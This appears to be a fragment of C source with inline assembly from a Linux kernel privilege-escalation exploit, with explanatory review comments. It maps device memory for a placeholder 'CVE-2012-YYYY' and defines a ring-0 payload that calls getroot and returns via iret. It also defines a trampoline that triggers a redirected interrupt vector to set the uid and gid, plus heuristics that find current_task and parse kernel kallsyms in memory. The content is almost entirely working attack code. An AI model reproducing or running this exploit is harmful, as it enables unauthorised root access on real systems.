// I HAD TO LEARN VGA FOR THIS
m = cve_2012_YYYY = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, fd, res + 0x619000);
if (m != MAP_FAILED) {
if ((m[0xf00/4] & 8) &&
(m = mmap(NULL, 0x10000, PROT_READ|PROT_WRITE, MAP_SHARED, fd, res + 0xa0000)) != MAP_FAILED) {
printf("[*] CVE-2012-YYYY\n");
mode_x(cve_2012_YYYY); // put into vga mode x, ish
return m;
}
munmap((void*)cve_2012_YYYY, 0x1000);
m = cve_2012_YYYY = MAP_FAILED;
}
return m;
}
// Name (and its length) of the task to locate -- presumably filled in by
// code outside this chunk before gettask() is used. TODO confirm caller.
static int tasknamelen;
static char taskname[64];
// The three entry points below are implemented in the inline asm blob
// that follows, hence the extern declarations here.
extern long gettask(void);
extern long testgetroot(void);
__used __kernel extern long callsetroot(long uid, long gid);
// FN(x): emit the prologue for a global function symbol from inline asm
// (.globl + @function type + label + CFI start). END closes the CFI block.
#define FN(x) ".globl " x "\n\t.type " x ",@function\n\t" x ":\n\t.cfi_startproc\n\t"
#define END ".cfi_endproc\n\t"
asm(
".text\n\t.align 4\n\t"
// Ring-0 payload, entered as an interrupt/trap handler: calls getroot()
// in kernel context, then irets back to userspace.
FN("testgetroot")
#ifdef __x86_64__
// Entered from userspace, so GS still holds the user base; swap to the
// kernel GS so getroot() can reach per-cpu data, and swap back before
// returning.
"swapgs\n\t"
"call getroot\n\t"
"swapgs\n\t"
"iretq\n\t"
#else
// 32-bit equivalent: save the user %fs in %edi and load selector 0xd8
// -- presumably the kernel per-cpu segment selector, TODO confirm --
// around the getroot() call.
"mov %fs, %edi\n\t"
"mov $0xd8, %esi\n\t"
"mov %esi, %fs\n\t"
"call getroot\n\t"
"mov %edi, %fs\n\t"
"iretl\n\t"
#endif
END
// gettask: heuristic fallback (used only if kallsyms parsing fails) to
// find the per-cpu slot holding current_task.
FN("gettask")
#ifdef __x86_64__
// MSR 0xc0000082 is IA32_LSTAR, the 64-bit syscall entry point
// (system_call). rdmsr returns it in %edx:%eax; sign-extending %eax
// recovers the canonical address -- assumes the kernel text lives in
// the usual sign-extended top-2GB mapping, so %edx can be dropped.
"mov $0xc0000082, %ecx\n\t"
"rdmsr\n\t"
"movslq %eax, %rax\n\t"
// Instruction alignment inside system_call is not fixed, so instead of
// a fixed offset, scan byte-by-byte for the first instruction whose
// bytes at +3/+4 are 0x65 0x48 (a %gs segment prefix followed by
// REX.W) -- i.e. the "mov %gs:kernel_stack,..." we expect there.
// current_task is, in most cases, right below kernel_stack in per-cpu
// space. This path is only needed if kallsyms fails.
"1:\n\t"
"cmpw $0x4865, 0x3(%rax)\n\t"
"je 2f\n\t"
"incq %rax\n\t"
"jmp 1b\n\t"
"2:\n\t"
// Pull the 32-bit %gs displacement out of the matched instruction's
// encoding (offset 17 -- presumably skips the preceding instructions'
// bytes; TODO confirm against the target kernel's disassembly).
"movl 17(%rax), %edx\n\t"
// Step through per-cpu space 8 bytes at a time until a slot holds a
// plausible pointer (non-zero and not -1); note only the low 32 bits
// are tested.
"3:\n\t"
"addl $8, %edx\n\t"
"movq %gs:(%edx), %rax\n\t"
"test %eax, %eax\n\t"
"jz 3b\n\t"
"cmpl $-1, %eax\n\t"
"je 3b\n\t"
#else
// TODO: no 32-bit fallback implemented; returns 0.
"xor %eax, %eax\n\t"
#endif
"ret\n\t"
END
// S1/S2: two-level stringify so the ENTRY macro's value (an interrupt
// vector number defined elsewhere) expands before being stringified.
#define S2(x) #x
#define S1(x) S2(x)
// Userspace trampoline: raises software interrupt ENTRY -- presumably a
// vector whose handler has been redirected to the payload above. On
// x86-64 the SysV argument registers (uid/gid in %rdi/%rsi) pass
// straight through; on 32-bit, %edi/%esi are callee-saved, so preserve
// them around the int.
FN("callsetroot")
#ifdef __x86_64__
"int $" S1(ENTRY) "\n\t"
#else
"push %edi\n\t"
"push %esi\n\t"
"int $" S1(ENTRY) "\n\t"
"pop %esi\n\t"
"pop %edi\n\t"
#endif
"ret\n\t"
END
".previous");
// Parsed view of the kernel's in-memory kallsyms tables, filled in by
// init_kallsyms() below. All pointers point into live kernel memory
// (see the layout notes that follow this struct).
struct kallsyms {
unsigned long *addresses;    // kallsyms_addresses[num_syms]
unsigned long num_syms;      // total symbol count
unsigned char *names;        // compressed symbol-name stream
unsigned long *markers;      // one marker per 256 symbols; markers[0] == 0
unsigned char *token_table;  // NUL-terminated token strings
unsigned short *token_index; // per-token offset into token_table
};
// Memory layout kallsyms, all pointer aligned:
// unsigned long addresses[num_kallsyms]
// unsigned long num_kallsyms
// unsigned char names[..]
// unsigned long markers[(num_kallsyms + 0xff) >> 8] = { 0, ... }
// char token_table[var...] = { null terminated strings }
// unsigned short token_index[var?...] = { 0, ... };
// This should probably work for both 64-bit and 32-bit kernels,
// but it has only been tested on 64-bit kernels.
// Locate and parse the kernel's in-memory kallsyms tables.
//
// Heuristic: scan [KERNEL_BASE+16MB, KERNEL_BASE+32MB) for two adjacent
// longs both equal to the scan start address -- presumably the repeated
// low text-symbol entries at the front of kallsyms_addresses (TODO
// confirm this holds across kernel configs). From there, walk forward
// to num_syms and derive the remaining table pointers from the layout
// described above.
//
// Returns num_syms on success, -1 if the signature was not found.
// NOTE(review): the unwind/parse phase has no upper bound; a false
// positive in the scan will walk into unrelated memory.
inline static long init_kallsyms(struct kallsyms *ks)
{
unsigned long start = KERNEL_BASE + 0x1000000L;
unsigned long *max = (void*)KERNEL_BASE + 0x2000000L;
unsigned long *cur;
// Stride by two longs for speed; checking both neighbours (cur[1] and
// cur[-1]) keeps the adjacent pair detectable despite the stride.
// NOTE(review): on the first iteration cur[-1] reads one long below
// `start` -- outside the intended scan window, though still mapped.
for (cur = (void*)start; cur < max; cur += 2) {
if (*cur == start &&
(cur[1] == start || cur[-1] == start))
goto unwind;
}
return -1;
unwind:
// Skip the rest of the address table: entries whose high bits match
// KERNEL_BASE still look like kernel pointers; the first long that
// doesn't match is num_syms.
while ((cur[0] & KERNEL_BASE) == KERNEL_BASE)
cur++;
// addresses[] sits exactly num_syms longs before the num_syms word.
ks->addresses = cur - *cur;
ks->num_syms = *(cur++);
ks->names = (unsigned char*)cur;
// Skip the names blob: stop at the first aligned zero long, which is
// markers[0] (assumes no aligned all-zero long occurs inside names --
// TODO confirm).
do { cur++; } while (*cur);
ks->markers = cur;
// One marker per 256 symbols, rounded up.
cur += (ks->num_syms + 0xff) >> 8;
ks->token_table = (unsigned char*)cur;
// Zero terminated string can create padding that could
// be interpreted as token_index, requiring the || !*cur
do { cur++; } while (*(unsigned short*)cur || !*cur);
ks->token_index = (unsigned short*)cur;
return (long)ks->num_syms;
}